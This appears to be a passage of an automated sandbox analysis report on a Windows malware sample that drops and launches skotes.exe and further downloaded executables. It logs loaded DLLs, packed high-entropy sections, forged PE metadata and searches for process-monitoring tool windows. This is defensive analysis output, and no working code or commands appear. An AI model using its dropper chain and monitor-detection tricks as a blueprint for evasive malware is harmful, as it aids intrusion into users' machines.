Source: unknown	Process created: C:\Users\user\Desktop\TxTPu961er.exe "C:\Users\user\Desktop\TxTPu961er.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\TxTPu961er.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe "C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe"
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe "C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe"
Source: C:\Users\user\Desktop\TxTPu961er.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe "C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe "C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: tmp6E66.tmp.7.dr

LNK file: ..\..\..\..\..\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: TxTPu961er.exe

Static file information: File size 2071040 > 1048576

Source: TxTPu961er.exe

Static PE information: Raw size of ihwqqeol is bigger than: 0x100000 < 0x18da00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\TxTPu961er.exe	Unpacked PE file: 0.2.TxTPu961er.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.8b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.8b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 5.2.skotes.exe.8b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihwqqeol:EW;hckhupnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Unpacked PE file: 7.2.9179bdeb47.exe.210000.0.unpack :EW;.rsrc:W;.idata :W; :EW;efrqcofg:EW;yqrfybbc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Unpacked PE file: 9.2.d34ebbe5f2.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gkomoxhs:EW;ufqmvtkl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gkomoxhs:EW;ufqmvtkl:EW;.taggant:EW;

Source: random[1].exe.5.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.5.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: tmp6E9C.tmp.7.dr	Static PE information: real checksum: 0x1fec52 should be: 0x20956a
Source: TxTPu961er.exe	Static PE information: real checksum: 0x1fec52 should be: 0x20956a
Source: 9179bdeb47.exe.5.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x1fec52 should be: 0x20956a
Source: random[1].exe0.5.dr	Static PE information: real checksum: 0x1c3ded should be: 0x1b830d
Source: d34ebbe5f2.exe.5.dr	Static PE information: real checksum: 0x1c3ded should be: 0x1b830d

Source: TxTPu961er.exe	Static PE information: section name:
Source: TxTPu961er.exe	Static PE information: section name: .idata
Source: TxTPu961er.exe	Static PE information: section name:
Source: TxTPu961er.exe	Static PE information: section name: ihwqqeol
Source: TxTPu961er.exe	Static PE information: section name: hckhupnb
Source: TxTPu961er.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: ihwqqeol
Source: skotes.exe.0.dr	Static PE information: section name: hckhupnb
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe.5.dr	Static PE information: section name:
Source: random[1].exe.5.dr	Static PE information: section name: efrqcofg
Source: random[1].exe.5.dr	Static PE information: section name: yqrfybbc
Source: random[1].exe.5.dr	Static PE information: section name: .taggant
Source: 9179bdeb47.exe.5.dr	Static PE information: section name:
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: .idata
Source: 9179bdeb47.exe.5.dr	Static PE information: section name:
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: efrqcofg
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: yqrfybbc
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: .taggant
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: gkomoxhs
Source: random[1].exe0.5.dr	Static PE information: section name: ufqmvtkl
Source: random[1].exe0.5.dr	Static PE information: section name: .taggant
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name:
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name: .idata
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name:
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name: gkomoxhs
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name: ufqmvtkl
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name: .taggant
Source: tmp6E9C.tmp.7.dr	Static PE information: section name:
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: .idata
Source: tmp6E9C.tmp.7.dr	Static PE information: section name:
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: ihwqqeol
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: hckhupnb
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008CD91C push ecx; ret	5_2_008CD92F
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_04E4A850 push es; ret	7_2_04E4A895
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0861C218 push es; ret	7_2_0861C225
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0861E880 push FFFFFFC3h; ret	7_2_0861E89A
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0861BFA1 push 0000005Eh; ret	7_2_0861C038
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_09B142B8 push ebx; ret	7_2_09B142DA
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Code function: 7_2_0A25BC64 push E802005Eh; ret	7_2_0A25BC69

Source: TxTPu961er.exe	Static PE information: section name: entropy: 7.215211613889866
Source: TxTPu961er.exe	Static PE information: section name: ihwqqeol entropy: 7.954670467397694
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.215211613889866
Source: skotes.exe.0.dr	Static PE information: section name: ihwqqeol entropy: 7.954670467397694
Source: random[1].exe.5.dr	Static PE information: section name: entropy: 7.966652808119376
Source: random[1].exe.5.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: entropy: 7.966652808119376
Source: 9179bdeb47.exe.5.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: random[1].exe0.5.dr	Static PE information: section name: gkomoxhs entropy: 7.953314721145262
Source: d34ebbe5f2.exe.5.dr	Static PE information: section name: gkomoxhs entropy: 7.953314721145262
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: entropy: 7.215211613889866
Source: tmp6E9C.tmp.7.dr	Static PE information: section name: ihwqqeol entropy: 7.954670467397694

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Jump to dropped file
Source: C:\Users\user\Desktop\TxTPu961er.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File created: C:\Users\user\AppData\Local\Temp\tmp6E9C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\TxTPu961er.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Window searched: window name: FilemonClass	Jump to behavior
